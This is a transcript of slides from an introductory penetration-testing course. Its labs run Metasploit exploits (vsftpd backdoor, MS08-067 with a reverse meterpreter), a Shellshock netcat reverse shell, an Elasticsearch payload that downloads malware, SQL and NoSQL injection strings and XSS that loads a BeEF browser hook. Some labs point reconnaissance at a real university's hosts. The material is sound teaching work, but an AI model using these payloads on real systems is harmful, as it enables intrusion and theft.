PenTest 101

Transcript

1. Lecturer: Иo1lz Time: Feb. 3rd, 2021 PenTest 101

2. # whoami • CSTI Servitor • Member of NISRA, NTUST

   Hack • Founder of SIRLA, Project Abyss • HITCON Hackdoor Instructor • My blog: https://nightcatv.github.io 2

3. Outline • Introduction • Tools • Network Scanning • Vulnerability

   Usage • Web Application Manual Detection 3

4. 本課程所有內容僅供教育使⽤ 若於其他場合使⽤ 請⾃⾏承擔法律責任 WARNING 4

5. Before We Start

6. Import Virtual Machine 6

7. 7

8. 8

9. 9

10. Virtual Machines • Kali Linux • Metasploitable 2 • Windows

    XP • OWASPBWA • Ubuntu 10

11. Set VirtualBox Network 11

12. 12

13. 13

14. 14

15. 15

16. 16

17. kali : kali 17 • Startup Kali Linux $ sudo

    passwd • Change root password root : [password] • Login with root

18. # apt update 18 • Update Kali Linux # apt

    upgrade • Upgrade Kali Linux

19. Introduction

20. 20

21. 21

22. None

23. How do you know about Cyber Security 23

24. Information Technology IT OT Operational Technology CT Communication Technology 24

25. Red Team Blue Team Offensive Defensive 25

26. 26 Academic Industry

27. 27

28. 28 • Fundament of cyber security • Usage of discrete

    mathematics

29. 29 • Research for different protocol • Classical attack •

    DDoS • KRACK

30. 30 • Simple to learn, but hard to be expert

    • Attack with application layer • Classical attack • XSS • SQL Injection

31. 31

32. 32 • Need more knowledge about operating system • Normally

    start with extension

33. 33 • Try to control the program • Need privilege

    escalation to control the computer

34. 34 • Find the log of APT attack • Trace

    back to the attacker

35. Technical Term Vulnerability • A weakness which can be exploited

    by a threat actor, such as an attacker, to cross privilege boundaries within a computer system. Attack Surface • The attack surface of a software environment is the sum of the different points where an unauthorized user can try to enter data to or extract data from an environment. CVE • Common Vulnerabilities and Exposures CVSS • Common Vulnerability Scoring System 35

36. Organization 36

37. Company 37

38. Community 38

39. Cyber Kill Chain 39

40. How do you know about Penetration Test 40

41. About Penetration Test • A penetration test, also know as

    pentest, is a simulation of cyber attack against the computer system to check for exploitable vulnerability. • Hardware • Website • Information system • Other equipment 41

42. About Penetration Test • PTES (Penetration Test Execution Standard) defined

    the following main section • Pre-engagement Interactions • Intelligence Gathering • Threat Modeling • Vulnerability Analysis • Exploitation • Post Exploitation • Reporting 42

43. Pre-engagement Interactions • Present and Explain the tools and techniques

    available • The information within this section is the result of the many years of combined experience of some of the most successful penetration testers in the world 43

44. Intelligence Gathering • Provide a standard designed specifically for the

    pentester performing reconnaissance against a target. • The intelligence gathering levels are currently split into three categories 44

45. Intellegnce Gathering Level • Level 1 • Can be obtained

    almost entirely by automated tools • Level 2 • Using automated tools from level 1 and some manual analysis • Level 3 • Think cultivating relationships on SocNet, heavy analysis, deep understanding of business relationships, most likely a large number of hours to accomplish the gathering and correlation

46. Threat Modeling • Required for correct execution of a penetration

    testing • The model used be consistent in terms of its representation of threats, their capabilities, their qualifications • Per the organization being tested • The ability to repeatedly be applied too future test with the same results 46

47. High level threat modeling process • Gather relevant document •

    Identify and categorize primary and secondary assets • Identify and categorize threats and threat communities • Map threat communities against primary and secondary assets

48. Vulnerability Analysis • Discovering flaws in systems and applications which

    can be leveraged by an attacker • Host • Service misconfiguration • Insecure application design 48

49. Exploitation • Focuses solely on establishing access to a system

    or resource by bypassing security restrictions • Should be well planned and precision strike 49

50. Post Exploitation • Determine the value of machine compromised •

    By the sensitivity of the data stored on it • The machine usefulness in further compromising • Maintain control of the machine for later use 50

51. Phases of post exploitation • Understanding the victim • Privilege

    escalation • Cleaning tracks and staying undetected • Collecting system information and data • Setting up backdooring and rootkits • Pivoting to penetrate internal networks

52. Reporting 52

53. Tools

54. Kali Linux • Debian-derived Linux distribution • Designed for •

    Digital forensics • Penetration testing 54

55. Metasploit • Provides information about security vulnerabilities and aids in

    penetration testing and IDS signature development 55

56. 56 Core Command s ============ = Command Descriptio n -------

    ---------- - ? Help men u banner Display an awesome metasploit banne r cd Change the current working director y color Toggle colo r connect Communicate with a hos t debug Display information useful for debuggin g exit Exit the consol e features Display the list of not yet released features that can be opted in t o get Gets the value of a context-specific variabl e getg Gets the value of a global variabl e grep Grep the output of another comman d help Help men u history Show command histor y load Load a framework plugi n quit Exit the consol e repeat Repeat a list of command s route Route traffic through a sessio n save Saves the active datastore s sessions Dump session listings and display information about session s set Sets a context-specific variable to a valu e setg Sets a global variable to a valu e sleep Do nothing for the specified number of second s spool Write console output into a file as well the scree n threads View and manipulate background thread s tips Show a list of useful productivity tip s unload Unload a framework plugi n unset Unsets one or more context-specific variable s unsetg Unsets one or more global variable s version Show the framework and console library version numbers

57. 57 Module Command s ============== = Command Descriptio n -------

    ---------- - advanced Displays advanced options for one or more module s back Move back from the current contex t clearm Clear the module stac k info Displays information about one or more module s listm List the module stac k loadpath Searches for and loads modules from a pat h options Displays global options or for one or more module s popm Pops the latest module off the stack and makes it activ e previous Sets the previously loaded module as the current modul e pushm Pushes the active or list of modules onto the module stac k reload_all Reloads all modules from all defined module path s search Searches module names and description s show Displays modules of a given type, or all module s use Interact with a module by name or search term/index

58. Burp Suite • Essential manual tools • Intercept all requests

    and responses • Target site map • Automatic modification of responses 58

59. Nmap • Nmap, network mapper • Free and open source

    • network discovery and security auditing 59

60. SQLMap 60

61. NoSQLMap 61

62. BeEF • Short for the browser exploitation framework • A

    penetration testing tool that focuses on the web browser 62

63. Network Scanning

64. Shodan 64

65. What is Shodan • A tool for searching devices connected

    to the internet • Common Usage: • Network Security • Market Research • Cyber Risk • Sanning IoT Devices • Tracking Ransomware 65

66. 66

67. 67

68. Your API Key QR code Your API Key

69. # pip3 install shodan 69 • Install Shodan # shodan

    init <YOUR API Key> • Initialize

70. Command 70 # shodan --help • Help Usage: shodan [OPTIONS]

    COMMAND [ARGS].. . Options : -h, --help Show this message and exit . Commands : alert Manage the network alerts for your accoun t convert Convert the given input data file into a different format . count Returns the number of results for a searc h data Bulk data access to Shoda n domain View all available information for a domai n download Download search results and save them in a compressed JSON.. . honeyscore Check whether the IP is a honeypot or not . host View all available information for an IP addres s info Shows general information about your accoun t init Initialize the Shodan command-lin e myip Print your external IP addres s org Manage your organization's access to Shoda n parse Extract information out of compressed JSON files . radar Real-Time Map of some results as Shodan finds them . scan Scan an IP/ netblock using Shodan . search Search the Shodan databas e stats Provide summary information about a search quer y stream Stream data in real-time . version Print version of this tool .

71. Command 71 # shodan info • Information # shodan version

    • Version Information # shodan myip • Personal IP address

72. Command 72 # shodan host 1.1.1.1 • Host Information •

    Find the host information, such as • Location • Opened port • Organization • etc.

73. Command 73 # shodan search -h • Search • Default

    output • IP • Port • Hostname • Data Usage: shodan search [OPTIONS] <search query > Search the Shodan databas e Options : --color / --no-colo r --fields TEXT List of properties to show in the search results . --limit INTEGER The number of search results that should be returned . Maximum: 100 0 --separator TEXT The separator between the properties of the searc h results . -h, --help Show this message and exit.

74. 74

75. 75

76. Lab Task Find a Fu-Jen University machine • Hint: •

    Use Shodan • Command: host / search 76

77. 77

78. Recon-NG 78

79. About Recon-NG • Passive search the open source information of

    an organization • IP address • Command Rule • Location • User • etc.

80. About Recon-NG • This tool is classified into groups •

    Discovery • Exploitation • Import • Recon • Report

81. Command 81 # recon-ng • Startup > workspaces create [workspace

    name] • Create workspace > workspaces list • Check workspace

82. Command 82 > marketplace refresh • Refresh modules > marketplace

    search [theme] • Search modules > marketplace install xxx/xxx/xxx • Install modules

83. Lab Task Install Modules • recon/domains-hosts/bing_domain_web • recon/domains-hosts/google_site_web • recon/domains-hosts/brute_hosts

    • recon/domains-hosts/netcraft • recon/hosts-hosts/resolve • recon/hosts-hosts/reverse_resolve • discovery/info_disclosure/interesting_files • recon/domains-contacts/whois_pocs • reporting/html 83

84. Command 84 > modules load recon/domains-hosts/google_site_web • Load modules >

    info • Show module’s option

85. Command 85 > options set SOURCE [URL] • Set Target

    > run • Execution

86. Command 86 > modules load reporting/html • Load report module

    > run • Execution

87. Lab Task Find a Fu-Jen University machine and report it

    • Hint: • Use recon-ng • Use recon/domains-hosts/google_site_web • Use reporting/html 87

88. Command 88 > modules load recon/domains-hosts/google_site_web • Load modules >

    info • Show module’s option

89. Command 89 > options set SOURCE fju.edu.tw • Set Target

    > run • Execution

90. Command 90 > modules load reporting/html • Load report module

    > run • Execution > options set CREATOR fju > options set CUSTOMER user • Set Creator and customer

91. Google 91

92. 92

93. Google Hacking • Uses Google search and other Google application

    to find security holes in the configuration and computer code that websites are using 93

94. 94

95. Search Syntax allintext • Search for specific text contained on

    any web page allintitle • Search for specific text contained on any web page that will show pages that contain titles with X characters 95

96. Search Syntax site • Show you the full list of

    all indexed URLs for the specified domain and subdomain inurl • The same as allinurl, but it is only useful for one single keyword 96

97. Search Syntax filetype • Used to search for any kind

    of file extensions intitle • Used to search for various keywords inside the title intext • Useful to locate pages that contain certain characters or strings inside their text 97

98. Lab Task Find a Fu-Jen University URL with login page

    • Hint: • Keyword: fju, login 98
99. None

100. Lab Task Try to find a log file • Hint:

     • Keyword: log 100
101. None

102. Lab Task Try to find an file system • Hint:

     • Keyword: index of 102
103. None

104. Vulnerability Usage

105. vsftpd 105

106. vsftpd • vsftpd, very secure ftp Daemon • The character

     who start up this service would be normal user • Any higher privilege commands are controlled by a special father program • Most command used in ftp has integrate into vsftpd 106

107. CVE-2011-2523 • vsftpd v2.3.4 contains a backdoor which opens a

     shell on port 6200 107

108. Lab Task Create a file in the target host •

     Hint: • Use Metasploit • Use vsftpd Vulnerability 108

109. # msfconsole 109 • Startup Metasploit > use exploit/unix/ftp/vsftpd_234_backdoor •

     Choose Vulnerability (exploit/unix/ftp/vsftpd_234_backdoor)> show options • Show Options of Vulnerability

110. (exploit/unix/ftp/vsftpd_234_backdoor)> set RHOST [IP address] 110 • Set Metasploitable 2

     IP address (exploit/unix/ftp/vsftpd_234_backdoor)> exploit • Execute the Vulnerability

111. > uname -a 111 • Show the System Information >

     touch [file_name] • Create a file with arbitrary name

112. MS08-067 112

113. CVE-2008-4250 • The server service allows remote attackers to execute

     arbitrary code via a craft RPC request that triggers the overflow during path canonicalization • Windows 2000 SP4 • Windows XP SP2 and SP3 • Windows Server 2003 SP1 and SP2 • Windos Vista Gold and SP1 • Windows Server 2008 • Windows 7 Pre-Beta 113

114. What is buffer overflow? 114 abcdefgh ij klmnop qrstuvwx yzzzzzzz

     abcdefga aaaaaaaa aaaaaaaa aaaaaaaa 8 8 16 8 8 16

115. Lab Task Buffer Overflow to get the flag • Hint:

     • Read Source Code • Be care of struct 115

116. # gcc bo.c -o bo 116 • Compile the source

     file # ./bo • Execution

117. > [any name] 117 • Input any username that doesn’t

     exist > 11111111111admin • Input 11 bits password with the following did

118. CVE-2008-4250 • The server service allows remote attackers to execute

     arbitrary code via a craft RPC request that triggers the overflow during path canonicalization • Windows 2000 SP4 • Windows XP SP2 and SP3 • Windows Server 2003 SP1 and SP2 • Windos Vista Gold and SP1 • Windows Server 2008 • Windows 7 Pre-Beta 118

119. What is RPC? • RPC, Remote Procedure Call • A

     computer program causes a procedure to execute in a different address space, which is coded as if it were a normal procedure call 119

120. 120

121. Lab Task Create a directory in the target host •

     Hint: • Use Metasploit • Use MS08-067 Vulnerability 121

122. # msfconsole 122 • Startup Metasploit > search ms08-067 •

     Search Vulnerability > use exploit/windows/smb/ms08-067_netapi • Choose Vulnerability

123. (exploit/windows/smb/ms08-067_netapi)> show options 123 • Show Option of Vulnerability (exploit/windows/smb/ms08-067_netapi)>

     set RHOST [IP address] • Set IP Address of Target Windows VM (exploit/windows/smb/ms08-067_netapi)> set LHOST [IP address] • Set IP Address of Kali Linux

124. (exploit/windows/smb/ms08-067_netapi)> set PAYLOAD windows/ meterpreter/reverse_tcp 124 • Set Payload (exploit/windows/smb/ms08-067_netapi)>

     exploit • Execute Vulnerability

125. meterpreter> sysinfo 125 • Show the System Information meterpreter> mkdir

     [directory_name] • Create a directory with arbitrary name

126. Heartbleed 126

127. CVE-2014-0160 • The TLS and DTLS implementations in OpenSSL do

     not properly handle Heartbeat Extension packet • Allow remote attacker to obtain sensitive information from process memory via crafted packet that trigger buffer over-read 127

128. What is OpenSSL? • A robust, commercial-grade, and full-feature toolkit

     for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols. 128

129. What is heartbleed? 129

130. 130

131. 131

132. 132

133. 133

134. 134 https://xkcd.com/1354/

135. Lab Reference • http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/ Heartbleed/ 135

136. Shellshock 136

137. CVE-2014-6271 • GNU Bash process trailing strings after function definitions

     in the values of environment variables • Vector: • sshd • mod_cgi • mod_cgid 137

138. What is “Bash”? • A Unix shell written for the

     GNU Project as a free software replacement for the Bourne shell (sh) • Provide end users an interface to issue system command and execute scripts 138

139. What is “Bash”? Environment variable 139 # echo $HOME /root

     # env | more COLORFGBG=15;0 COLORTERM=truecolor ...

140. What is “Bash”? De fi ne bash function 140 #

     welcome() { echo “Hi, $USER” } # welcome Hi, root

141. What is “Bash”? De fi ne environment variable 141 #

     export envvar = “echo \“Hi, $USER\”” # bash -c $envvar Hi, root

142. How shellshock work? 142 • Bash incorrectly executes trailing commands

     imports a function definition stored into an environment variable () { :; };

143. How shellshock work? 143 env x = ‘() { :;

     }; echo vulnerable’ bash -c “cat /etc/passwd” Legit function definition in BASH environment variable Injection of arbitrary OS command BASH command invoked with on-the-fly defined environment

144. Shellshock Attack Vectors • RCE via Apache with mod_cgi, CGI

     scripts, Python, Perl • RCE on DHCP clients using Hostile DHCP Server • OpenSSH RCE / Privilege escalation

145. Before we start Lab Task • Startup OWASPBWA virtual machine

     • Download scripts in kali 145 # git clone https://github.com/cheetz/icmpshock /opt/icmpshock

146. Lab Task Make the target machine send ping packet to

     kali • Hint: • Use the script • Startup tcpdump 146

147. # cd /opt/icmpshock 147 • Change directory # chmod +x

     icmpshock.py • Change authorization of the script

148. # vi target_list.txt 148 • Modify the target list >

     [OWASPBWA IP] • Add target IP into the file at the first line

149. # tcpdump -nni eth0 -e icmp[icmptype] == 8 149 •

     Startup tcpdump to monitor ICMP # python icmpshock.py [Kali Linux IP] target_list.txt • Startup script

150. Lab Task Try to acquire the target shell • Hint:

     • Use the script • Modify the script at 72 to 73 lines 150

151. # vi icmpshock.py 151 • Modify the script #Command =

     “/bin/ping -c1 ” + LISTENER • Comment the 72th line Command = “/bin/nc.tradition “ + LISTENER + “ 4444 -e /bin/bash” • Uncomment the 73th line and modify

152. # nc -l -p 4444 152 • Startup nc #

     python icmpshock.py [Kali Linux IP] target_list.txt • Startup script

153. Elastic Search 153

154. CVE-2015-1427 • Elasticsearch engine allow remote attackers to bypass the

     sandbox protection mechanism and execute arbitrary shell commands via a crafted script. 154

155. What is Elastic Search? • An search engine base on

     Lucene library • Developed in Java • It provides a distributed, multitenant-capable full text search engine • HTTP web interface • Schema-free JSON document 155

156. Feature of Elastic Search _search • _search API endpoint is

     to allow user to submit groovy code in search query itself • Allow anybody to submit server-side code to get executed 156

157. Feature of Elastic Search _search 157 {"query" : {"filtered": {

     "query": {"match_all": {}}}} , "script_fields": {"exp": { "script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/malware http://x.x.x.x/malware \").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null) {sb.append(str);sb.append(\"\r\n\");}sb.toString();" }}}

158. How the sandbox works? • The functions and classes that

     are allowed by the sandbox are found in GroovySandboxExpressionChecker.java • The function isAuthorized takes in an expression and checks to see if it is allowed to be executed 158

159. How the sandbox works? 159 if (expression instanceof MethodCallExpression) {

     MethodCallExpression mce = (MethodCallExpression) expression ; String methodName = mce.getMethodAsString() ; if (methodBlacklist.contains(methodName)) { return false ; } else if (methodName == null && mce.getMethod() instanceof GStringExpression) { // We do not allow GStrings for method invocation, they are a security risk return false ; } // snip }

160. How the sandbox works? Condition 160 if (methodBlacklist.contains(methodName)) public static

     String[] defaultMethodBlacklist = new String[] { "getClass" , "wait" , "notify" , "notifyAll" , "finalize" };

161. How the sandbox work? Condition 161 if (methodName == null

     && mce.getMethod() instanceof GStringExpression) • Method name is not null • Do not use a GStringExpression

162. How the sandbox work? Restricts the packages 162 if (receiversWhiteList

     != null && !receiversWhiteList.contains(typeName)) { throw new SecurityException("Method calls not allowed on [" + typeName + "]") ; } else if (receiversBlackList != null && receiversBlackList.contains(typeName)) { throw new SecurityException("Method calls not allowed on [" + typeName + "]") ; }

163. How the sandbox work? Restricts the packages 163 private final

     static String[] defaultReceiverWhitelist = new String [] { groovy.util.GroovyCollections.class.getName() , java.lang.Math.class.getName() , java.lang.Integer.class.getName(), "[I", "[[I", "[[[I" , //snip };

164. Bypassing the sandbox with reflection Load the java.lang.Runtime 164 $

     curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\")"}}} ' { <snip > "hits" : { "total" : 8 , "max_score" : 1.0 , "hits" : [ { <snip > "fields" : { "myscript" : [ "class java.lang.Runtime" ] } } }}

165. Before we start Lab Task • Startup ubuntu virtual machine

     • Login with root:root 165 # cd elasticsearch-1.4.1/bin # ./elasticsearch

166. Lab Task Exploit Elasticsearch • Hint: • Use XiphosResearch/Exploits 166

167. # git clone https://github.com/XiphosResearch/exploits /opt/ XiphosResearch_Exploits 167 • Download exploit

     # cd /opt/XiphosResearch_Exploits/ElasticSearch • Change Directory

168. # chmod +x ./elastic_shell.py 168 • Add execution authorization #

     python ./elastic_shell.py [ElasticSearch IP address] • Startup exploit script

169. Web Application Manual Detection

170. SQL Injection 170

171. What is SQL? • SQL, Structured Query Language • is

     used to communicate with a database • Common relational database management systems that use SQL • Oracle • Microsoft SQL Server • MariaDB • etc. 171

172. Basic SQL Syntax 172 SELECT [column_name] FROM [table_name] WHERE [condition]

     Column Name in the specified table Table Name in the specified database Condition that judge whether the value is true or not

173. SQL Syntax Example 173 SELECT user, pass FROM users_data WHERE

     user=vin Column Name in the specified table Table Name in the specified database Condition that judge whether the value is true or not

174. What is SQL Injection? $user = $_GET['user']; $pass = $_GET['pass'];

     $res = mysql_query("SELECT * FROM users WHERE user='$user' AND pass='$pass'", $link); 174

175. What is SQL Injection? SELECT * FROM users WHERE user='$user'

     AND pass='$pass' 175 SELECT * FROM users WHERE user='asdf' AND pass='asdf' user=asdf pass=asdf

176. What is SQL Injection? SELECT * FROM users WHERE user='$user'

     AND pass='$pass' 176 SELECT * FROM users WHERE user=‘’ OR 2=2 -- ’ AND pass='asdf' user=‘ OR 2=2 -- pass=asdf

177. Before we start Lab Task • Startup OWASPBWA virtual machine

     • Login with root:owaspbwa 177

178. 178

179. 179

180. Lab Task Inject the web application • Target: [OWASPBWA IP]/mutillidae/index.php/?page=user-

     info.php • Hint: • Read Error Message carefully 180

181. 181

182. 182

183. 183

184. SELECT * FROM accounts WHERE username=‘aaaa’' AND password='' 184 SELECT

     * FROM accounts WHERE username=‘’ OR 1=1 -- AND password='' Username = ‘ OR 1=1 --

185. 185

186. 186

187. Lab Task Use sqlmap to inject target page • Target:

     [OWASPBWA IP]/mutillidae/index.php/? page=login.php • Hint: • Set “--data=“username=&password=&login-php-submit- button=Login”” 187

188. # sqlmap -u “[OWASPBWA IP]/mutillidae/index.php/? page=login.php” --data=“username=aaa&password=bbb&login-php- submit-button=Login” -b --random-agent

     188 • Startup sqlmap

189. 189

190. 190

191. 191

192. SELECT * FROM accounts WHERE username=‘aaaa’’; 192 SELECT * FROM

     accounts WHERE username=‘‘ OR ‘’=‘'; Username = ‘ OR ‘’='

193. 193

194. 194

195. 195

196. 196

197. SELECT * FROM accounts WHERE username=‘’ AND password=‘'; 197 SELECT

     * FROM accounts WHERE username=‘‘ OR ‘’=‘’ AND password=‘’ OR ‘’=‘'; Username = ‘ OR ‘’=‘ Password = ‘ OR ‘’=‘

198. 198

199. 199

200. NoSQL Injection 200

201. About NoSQL • Also named as “non-SQL” or “non-relational SQL”

     • Differ from traditional relational SQL database 201

202. Scope Based on OWASP 2016 202 Database Type Ranking MongoDB

     Document store 5 Redis Key-value store 9 Memcached Key-value store 23 CouchDB Document store 26

203. Attacker Model 203

204. Basic Syntax Use MongoDB as example db.users.find ( {name: "duran"}

     , {name: 1, address: 1 } ).limit(5) Database Name Collection Name Query Projection Modifier 204

205. What is NoSQL Injection? 205 { "username": { "$ne": "[email protected]"

     } , "password": { "$ne": "mymaliciouspassword" } } • An web application got a json filetype username and password

206. What is NoSQL Injection? 206 Model.findOne(req.body ) // o r

     Model.findOne({ username: req.body.username, password: req.body.password });

207. What is NoSQL Injection? 207 Model.findOne( { username: { $ne:

     "[email protected]" } , password: { $ne: "mymaliciouspassword" } });

208. Known Attack Method Based on OWASP 2016 • Login bypass

     for MongoDB on PHP and NodeJS • String concatenation for JSON and scrip • Escaping flaws of drivers 208

209. XSS 209

210. 210 OWASP Web Application Security Risk Top 10 (2013) 1

     Injection 2 Broken Authentication and Session Management 3 Cross-site Scripting (XSS) 4 Insecure Direct Object References 5 Security Miscon fi guration 6 Sensitive Data Exposure 7 Miss Function Level Access Control 8 Cross-site Request Forgery (CSRF) 9 Using Known Vulnerabilities Component 10 Unvalidated Redirects and Forwards OWASP Web Application Security Risk Top 10 (2017) 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities (XXE) 5 Broken Access Control 6 Security Miscon fi guration 7 Cross-site Scripting (XSS) 8 Insecure Deserialize 9 Using Component with Known Vulnerabilities 10 Insu ffi cient Logging & Monitoring

211. About XSS • Cross-site scripting (XSS) is a web vulnerability

     that allows an attacker to compromise the interactions. • Normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform. 211

212. How XSS work? https://insecure-website.com/comment?message=<script src=https://evil-user.net/badscript.js></script> Attacker Victim Login Sensitive Data

     Send E-mail

213. XSS Type • Reflected XSS • The malicious script comes

     from the current HTTP request • Stored XSS • The malicious script comes from the website’s database • DOM-based XSS • The vulnerability exists in client-side code rather than server- side code

214. What is reflected XSS? • The simplest variety of cross-site

     scripting. • An application data in an HTTP request and includes that data within the immediate response in unsafe way. 214

215. http://insecure-website.com/search?term=gift Search “gift” <p> You searched for: gift </p> 215

216. http://insecure-website.com/search? term=<script>\* Bad stuff here… */</script> Search “<script>\* Bad stuff

     here… */</ script>” <p> You searched for: <script> \* Bad stuff here… */ </script> </p> 216

217. What is stored XSS? • Also known as persistent or

     second-order XSS • When the application receive data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. 217

218. http://insecure-website.com/ Leave comment “Hello, this is my message.” <p> Hello,

     this is my message. </p> 218

219. http://insecure-website.com/ Leave comment “<script>/* Bad stuff here... */</script>” <p> <script>

     /* Bad stuff here... */ </script> </p> 219

220. Before we start Lab Task • Startup OWASPBWA virtual machine

     • Login with root:owaspbwa 220

221. Before we start Lab Task • Install BeEF Exploitation Framework

     221 # git clone https://github.com/beefproject/beef /opt/beef # cd /opt/beef # ./install # vi config.yaml > user: “beef” > passwd: “[any string]” • Change the default user and password

222. Before we start Lab Task • Startup BeEF 222 #

     ./beef

223. Before we start Lab Task • Visit User Interface at

     http://127.0.0.1:3000/ui/ authentication • Login with beef:beef • Visit hook.js 223

224. 224

225. Lab Task Use XSS to hook the malicious script •

     Target: [OWASPBWA IP]/owaspbricks • Hint: • See the source carefully to find out where the website past the text directory 225

226. 226

227. • The real target is [OWASPBWA IP]/owaspbricks/content- pages.html • Choose

     any content and read the url 227

228. 228

229. 229

230. • Inject the URL like 230 • [OWASPBWA IP]/owaspbricks/content-2/index.php? user=<script>alert(“XSS”)</script>

231. 231

232. • Inject the URL like 232 • [OWASPBWA IP]/owaspbricks/content-2/index.php? user=<script

     src=http://[Kali IP]:3000/hook.js></script>

233. 233

234. • Visit the http://127.0.0.1:3000/ui/panel • You will see the machine

     has already be the one of your botnet 234

235. 235

236. Q & A

237. Thanks for listening.